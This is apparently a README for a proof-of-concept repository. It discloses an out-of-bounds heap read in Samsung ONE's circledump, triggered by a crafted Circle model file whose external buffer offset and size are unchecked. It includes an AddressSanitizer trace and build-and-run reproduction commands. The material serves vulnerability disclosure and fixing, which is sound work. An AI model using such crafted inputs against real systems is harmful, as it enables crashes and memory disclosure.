# Circle External Buffer Offset/Size OOB Read PoC This repository contains a minimal Circle model file that demonstrates an out-of-bounds read in Samsung ONE's Circle inspection path. ## Summary Samsung ONE's `mio_circle::Reader::buffer_info()` handles Circle external buffers by checking only the starting `offset` with `std::vector::at()`, then returning the attacker-controlled `size` to callers. A Circle file can set an external buffer to start at the final byte of the file and advertise a much larger size. `circledump` then reads past the end of the file buffer while dumping that buffer. ## Artifact - PoC model: `poc/external_offset_oob.circle` - SHA256: `20962ae3e01d2489f1ba6766f4d804414e5e5cb490589a23aa986f97abe0abd5` - File size: 232 bytes - External buffer values: `offset=231`, `size=4096` ## Evidence The captured ASan trace is in `poc/asan-circledump-direct.stderr.txt`. Relevant top of stack: ```text ERROR: AddressSanitizer: heap-buffer-overflow READ of size 1 circledump::dump_buffer(...) Dump.cpp:48 circledump::dump_model(...) Dump.cpp:404 operator<<(...) Dump.cpp:479 circledump_direct_driver.cpp:41 0 bytes after 232-byte region ``` ## Reproduction Outline Use Samsung ONE current source and FlatBuffers 23.5.26. Build `flatc`/`libflatbuffers`, regenerate the Circle schema header, then compile the direct `circledump` core driver with ASan: ```bash cmake -S /tmp/flatbuffers-23.5.26 -B /tmp/flatbuffers-23.5.26-build \ -G Ninja -DFLATBUFFERS_BUILD_TESTS=OFF -DFLATBUFFERS_INSTALL=OFF -DCMAKE_BUILD_TYPE=Release cmake --build /tmp/flatbuffers-23.5.26-build --target flatc flatbuffers -j2 clang++ -std=c++17 -O1 -g -fsanitize=address,undefined -fno-omit-frame-pointer \ -I/tmp/flatbuffers-23.5.26/include \ -I/tmp/circle-include-current \ -I/path/to/ONE/compiler/mio-circle/include \ -I/path/to/ONE/compiler/circledump/include \ -I/path/to/ONE/compiler/circledump/src \ poc/circledump_direct_driver.cpp \ /path/to/ONE/compiler/circledump/src/Dump.cpp \ /path/to/ONE/compiler/circledump/src/MetadataPrinter.cpp \ /path/to/ONE/compiler/circledump/src/OpPrinter.cpp \ /path/to/ONE/compiler/mio-circle/src/Reader.cpp \ /path/to/ONE/compiler/mio-circle/src/Helper.cpp \ /tmp/flatbuffers-23.5.26-build/libflatbuffers.a \ -o /tmp/circledump_direct_driver_current ASAN_OPTIONS=abort_on_error=0:symbolize=1 \ /tmp/circledump_direct_driver_current poc/external_offset_oob.circle ``` Full local notes are in `TECHNICAL_NOTES.md`.